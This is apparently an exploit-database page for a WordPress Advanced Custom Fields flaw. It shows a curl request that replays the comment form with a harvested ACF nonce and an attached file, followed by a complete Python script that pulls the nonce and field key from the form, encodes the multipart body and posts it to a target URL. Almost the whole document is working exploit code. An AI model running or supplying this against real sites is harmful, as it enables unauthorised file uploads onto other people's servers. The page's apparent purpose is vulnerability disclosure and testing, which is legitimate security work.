## https://sploitus.com/exploit?id=WPEX-ID:3FDE5336-552C-4861-8B4D-89A16735C0E2
The `_acf_nonce` value is taken from the ACF form rendered in the frontend (it is a hidden input in the page); the value in the request below was read from that form, together with the `_acf_post_id` and the `acf[field_...]` key.
```bash
# Multipart POST to the WordPress comment handler. The acf[...] fields are
# consumed by the ACF frontend form handler; -F 'acf[name]=@rickroll.mp4'
# makes curl read the local file and send it as a file upload.
curl \
  -i -s -k -X 'POST' \
  -F "comment=Test comment" \
  -F '_acf_post_id=1' \
  -F '_acf_validation=1' \
  -F '_acf_nonce=ba2ef314e0' \
  -F '_acf_changed=0' \
  -F 'acf[field_62c8939d255d8]=Something' \
  -F 'author=testing' \
  -F 'email=testing@example.com' \
  -F 'url=' \
  -F 'submit=Post+Comment' \
  -F 'comment_post_ID=1' \
  -F 'comment_parent=0' \
  -F 'acf[name]=@rickroll.mp4' \
  'http://play.local/wp-comments-post.php'
```
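The two steps above (read the nonce and field key from the frontend form, then replay the comment POST with a file part) can be scripted. The following is an added example, not the page's own exploit code: it parses the hidden `_acf_nonce`, `_acf_post_id` and `acf[field_...]` inputs out of a constructed sample of the form, rebuilds the same field set as the curl command, and encodes it as multipart/form-data with the standard library only. The sample HTML, the `http://play.local` base URL and the file contents are assumptions for illustration.

```python
"""Replay the ACF frontend-form comment POST after pulling the nonce from the page.

Added example; not the page's or ACF's own code. Field names mirror the curl
request above; the sample form below is constructed, not captured from a site.
"""
import re
import sys
import uuid
import urllib.request
from html.parser import HTMLParser

# Constructed stand-in for the rendered ACF frontend form (assumption).
SAMPLE_FORM = """
<form method="post">
  <input type="hidden" name="_acf_post_id" value="1" />
  <input type="hidden" name="_acf_validation" value="1" />
  <input type="hidden" name="_acf_nonce" value="ba2ef314e0" />
  <input type="hidden" name="_acf_changed" value="0" />
  <input type="text" name="acf[field_62c8939d255d8]" value="" />
</form>
"""


class InputCollector(HTMLParser):
    """Collect name=value of every <input> (hidden ones included)."""

    def __init__(self):
        super().__init__()
        self.inputs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            a = dict(attrs)
            if "name" in a:
                self.inputs[a["name"]] = a.get("value") or ""


def extract_acf_form(html):
    """Return (nonce, post_id, field_key) from an ACF frontend form, or raise."""
    p = InputCollector()
    p.feed(html)
    nonce = p.inputs.get("_acf_nonce")
    post_id = p.inputs.get("_acf_post_id")
    field_key = None
    for name in p.inputs:
        m = re.fullmatch(r"acf\[(field_[0-9a-f]+)\]", name)
        if m:
            field_key = m.group(1)
            break
    if not (nonce and post_id and field_key):
        raise ValueError("ACF nonce, post id or field key not found in form")
    return nonce, post_id, field_key


def build_comment_fields(nonce, post_id, field_key, text_value="Something"):
    """Same text fields as the curl command, with the values read from the form."""
    return {
        "comment": "Test comment",
        "_acf_post_id": post_id,
        "_acf_validation": "1",
        "_acf_nonce": nonce,
        "_acf_changed": "0",
        f"acf[{field_key}]": text_value,
        "author": "testing",
        "email": "testing@example.com",
        "url": "",
        "submit": "Post Comment",
        "comment_post_ID": post_id,
        "comment_parent": "0",
    }


def encode_multipart(fields, files):
    """Encode text fields and {name: (filename, bytes)} files as multipart/form-data."""
    boundary = uuid.uuid4().hex
    body = bytearray()
    for name, value in fields.items():
        body += (f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"'
                 f"\r\n\r\n{value}\r\n").encode()
    for name, (filename, data) in files.items():
        body += (f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"; '
                 f'filename="{filename}"\r\nContent-Type: application/octet-stream'
                 "\r\n\r\n").encode()
        body += data + b"\r\n"
    body += f"--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", bytes(body)


def post_comment(base_url, fields, files):
    """Send the request to wp-comments-post.php; returns (status, body)."""
    ctype, body = encode_multipart(fields, files)
    req = urllib.request.Request(base_url + "/wp-comments-post.php", data=body, method="POST")
    req.add_header("Content-Type", ctype)
    with urllib.request.urlopen(req) as resp:  # follows the redirect WP sends on success
        return resp.status, resp.read()


if __name__ == "__main__":
    nonce, post_id, key = extract_acf_form(SAMPLE_FORM)
    fields = build_comment_fields(nonce, post_id, key)
    files = {"acf[name]": ("rickroll.mp4", b"\x00\x00\x00\x18ftypmp42")}  # constructed bytes
    if len(sys.argv) > 1:  # pass the base URL to actually send, e.g. http://play.local
        print(post_comment(sys.argv[1].rstrip("/"), fields, files)[0])
    else:
        print(fields)
```

In practice the form HTML is fetched from the page that renders the ACF frontend form rather than read from `SAMPLE_FORM`; the parser does not care which, and the nonce it finds is whatever the site issued for that page load.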